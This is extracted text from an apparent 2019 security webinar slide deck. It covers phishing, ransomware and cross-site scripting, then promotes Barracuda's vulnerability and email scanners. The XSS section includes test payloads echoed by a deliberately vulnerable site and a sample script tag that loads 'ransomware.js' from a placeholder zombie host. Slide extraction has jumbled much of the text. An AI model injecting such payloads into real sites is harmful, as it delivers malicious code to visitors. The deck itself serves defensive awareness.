“Latest Security Threat Research…and How To Protect Yourself”
11-19-2019
Agenda
• Sh
• Welcome and Introductions – Chris Riley- Shawn Duffy, Principal
Duffy Compliance Services • Email Phishing Attacks
• Web XSS Attacks
- Courtney Vick, Territory Manager - Barracuda
• Sh
Audio – In presentation mode until end
Control Panel
View webinar in full screen mode
Feel Free to submit written questions
Open Q & A at the end
(please raise your hand & we will unmute your
line)
Survey at conclusion of webinar
During the Webinar…
We Hope You are
Enjoying Your
Pizza!!
Please double check with your receptionist
then contact Mike Jones:
[email protected] We will research and replace with an e-card
(We are recording the webinar – so don’t think twice about stepping away
for a few minutes to go pick it up at your front desk!)
System Source is a regional systems integratorWe have the people, processes and tools to help clients improve, maintain and acquire IT and Audio-Visual systems.
• We help IMPROVE IT operations. Clients ask us to train their staff for more productivity or rent our classrooms for private classes.
• We design PRESENTATION rooms including collaborative conference and classrooms.
• IMPROVING IT often requires top CONSULTANTS.
Shawn DuffyDuffy Compliance Services
• Social Media profiling
• Phishing
• Ransomware
Social Media profiling
• What sites are you active on?• What are you sharing? (images, memes)• What are you chatting about?
• Are you looking for a job?• Are you looking for a relationship?• Your or someone’s health status
• Collect names of Pets & Family members • Vacation times and destinations• Passions (e.g., politics, religion)
Phishing
Ransomware
Cyber Extortion• Uses strong encryption• Payment via Bitcoin• Plenty of Variants
Web Application - XSS• Reflective:
• Non-Persistent XSS Technique
• Stored: • Persistent XSS
Technique
• DOM:• Client side
Technique
Barracuda Vulnerability Manager
https://bvm.barracudanetworks.com/login
https://www.../products/vulnerabilitymanager
Web Application – Walk thru• Vulnerable Test Site: http://public.blorpazort.com/
Web Application – Test Results• Barracuda Vulnerability Scan • Partial Results for #5
http://public.blorpazort.com/pages/xss_parsing_test.phpThe url parameter was submitted with the value "--><script>prompt(12345)</script>OCo9e<!--, and the string was echoed verbatim in the output.http://public.blorpazort.com/pages/page_header_inject.phpThe fname parameter was submitted with the value <script>prompt(12345)</script>v5Kh3, and the string was echoed verbatim in the output.http://public.blorpazort.com/pages/xss_form_post.phpThe search parameter was submitted with the value <script>prompt(12345)</script>nI45u, and the string was echoed verbatim in the output.
Web Application – Reflective XSSReview of http://public.blorpazort.com/pages/xss_form_post.php
<script>prompt(12345)</script>nI45u<img src='https://duffycompliance.com/images/DCS-logo.png' />
<script src=“http://<Zombie_IP/malware/ransomware.js”></script>
Web Application – Stored XSS• Review of http://public.blorpazort.com/pages/pager_header_inject.php
• https://google-gruyere.appspot.com/start
Web Application – Exploits
• System Security Assessments• Network, Wireless, and Web Application
• Security Control Evaluations
• Penetration Testing
• Privacy & Cybersecurity (CUI, HIPAA, FISMA, GDPR)• Compliance Frameworks (NIST, ISO, CSF, PF)
• Security Policy & Procedure Development
• Gap Analysis & Compliance Audits & DPIA
• Security Remediation Services
Courtney VickTerritory Manager - Barracuda
•BarracudaYour journey, secured
BR
AN
D -
Co
nte
nt
Fast stats…
Founded: 2003 Headquartered in
Silicon Valley
Offices in over
15 countries
Worldwide
employees:
1600+
Partners: 6500+
Customers:
150,000+ in over
100 countries
Revenue FY19:
USD 493 million
BR
AN
D -
Co
nte
nt Challenge Why it matters
Digital transformation
IT becoming differentiator in every function, every industry. Security
concerns almost everything you do. Cloud, SaaS is the new way to support
business innovation.
LOFT & FRAGTrained security resources are a HUGE limiting factor, especially given ever
more complex security landscape
Protecting data is priority #1Customer data ever more valuable, consequences of a breach never
greater
Evolving threat landscapeEnterprise perimeter has collapsed, attacks more targeted and
sophisticated. Email now THE place where most attacks start.
Customers tell us they face these challenges…
Security matters more than ever
Security is harder to manage than ever
Protecting your data is critical
Yesterday’s technology is no longer good enough
BR
AN
D -
Inte
rtitle
Free Vulnerability Scanner
BR
AN
D -
Co
nte
nt
What is an application?
Web App
Mobile App
API
BR
AN
D -
Co
nte
nt
How is an application secured?
Application
Servers
BR
AN
D -
Co
nte
nt
What percentage of apps are protected by WAFs?
Trivia
BR
AN
D -
Co
nte
nt
Today, fewer than 10%
And the answer is…
BR
AN
D -
Co
nte
nt
111
140
145
171
276
308
324
347
414
Payment Card Skimmers
Crimeware
Lost and Stolen Assets
Cyber-Espionage
Privilege Misuse
Everything Else
Point of Sale
Miscellaneous Errors
Web Applications
Frequency of Incidents
The #1 vector reported in business breaches
Web App Threats: the Top Emerging Vector
Percentage of vulnerabilities that
are web-based
80%Percentage of
cyberattacks that target web
applications
75%Number of malicious
ad impressionsper year
$12BNumber of websites defaced in the last
five years
$5M
Everyone is a Target
•Web exploitation kits available
• Easy to procure• No expertise required• They operate like companies• Can attack thousands of servers
in seconds
Barracuda Vulnerability Manager
Barracuda Vulnerability Manager
• Scan for web application vulnerabilities across entire website
•Granular capability
•Detailed vulnerability scan reports
• Integration with Barracuda Web Application Firewall
• Free service
Logging In
•Got to https://bnvlm.barracuda.com and log in with your Cloud Control credentials
Easy Identification and Remediation
Barracuda WAF Integration
• Import vulnerability report
Barracuda WAF Integration
• Remediate with a single click
Creating a Scan
• Enter a scan name and the URL you wish to scan
• Click ‘Start Scan’
Monitor a Scan
• Scans can take anywhere from 5 minutes to 48 hours depending on size and complexity of the site
• You can see the progress of your scan on the Active Scans tab
Viewing Reports
• View completed scans on the Finished Scans page
Viewing Reports• Click ‘Details’ next to a scan for a quick overview of the vulnerabilities
found during the scan
• Click ‘Copy’ to start another scan with the same configuration (you can change anything necessary before starting the new scan)
• Click ‘View’ to see the scan report in a browser
• Click ‘Download’ to download the scan report in one of three formats
BVM Reports
•We’ll review each component of a Barracuda Vulnerability Manager report:
BVM Reports: Vulnerabilities
• There are four severity levels for vulnerabilities:• Critical: These issues could allow hackers to cause catastrophic problems with
the web application, such as disabling it altogether, defacing it, or obtaining access to all of the site’s confidential data.
• High: These issues could allow hackers unauthorized access to certain pieces of data, or access to restricted parts of the site, under certain circumstances.
• Medium: These issues could allow hackers to perform phishing campaigns more easily, or defraud users of your application.
• Low: These issues can cause annoyances and may affect your SEO, but there is no significant risk.
BVM Reports: Vulnerabilities
• There are three confidence levels for vulnerabilities:• Certain: The scanner has confirmed that the vulnerability exists.• Likely: The scanner is reasonably certain that the vulnerability exists, but it
should be confirmed manually.• Possible: The scanner thinks the vulnerability may exist, but a manual check is
require to confirm.
BR
AN
D -
Co
nte
nt Verticals
• Finance / Retail (eCommerce) / Healthcare / Government
Have sensitive data to secure• Compliance: PCI, HIPAA, GDPR
• Online retail inventory or pricing information
Public cloud• The most deployed WAF in AWS and Azure
• Near-native integration with cloud platforms
Where we shine
BR
AN
D -
Inte
rtitle
Barracuda Email Threat Scanner
BR
AN
D -
Co
nte
nt
Targeted attacks start with email
74%
“Almost three quarters of all attacks start with email attachment or a link.”
2017 Threat Landscape Survey: Users on the Front Line - SANS Analyst Program
- SANS Analyst Program
BR
AN
D -
Co
nte
nt
Spam
and
malware
Attacks Increased complexity every yearR
isk
and
co
mp
lexi
ty
Time
SOX,
HIPAA,
FINRA
eDiscovery
Zero-day
attacksPhishing
Brand
erosion,
email trust
Ransom-
ware
Spear
phishing,
whaling,
BEC,
CEO fraud,
socially
engineered
phishing
Unified
mobile
inboxes and
unsecured
executive
personal
accounts
2000 2019
Account
takeover
(ATO)
BR
AN
D -
Co
nte
nt
The challenge
Personal
Spear
phishing
Mail server Corporate
inbox
EmployeesInternetATO
Spam
Firewall,
DLP,
Backup,
Archiving,
Sandboxing
Legitimate
dail
Zero day
BR
AN
D -
Co
nte
nt
Social engineering bypasses traditional approach
Most email security relies on volume / blacklisting• IP• Sender• Link• Domain• Text
Attackers have developed counter-measures• Zero-day links• Malicious pages hosted on legitimate domains• Targeted campaigns• ATO emails seem “trusted”
BR
AN
D -
Co
nte
nt
Email Threat Scanner
https://www.barracuda.com/email_scan
BR
AN
D -
Co
nte
nt One time pass of your O365 instance
Identifies current threats already within the employee inbox
Produce a report to visualise the business risk
Support build of business case & further discussions
Email Threat Scanner benefits
• Sh
Thank you for attending today!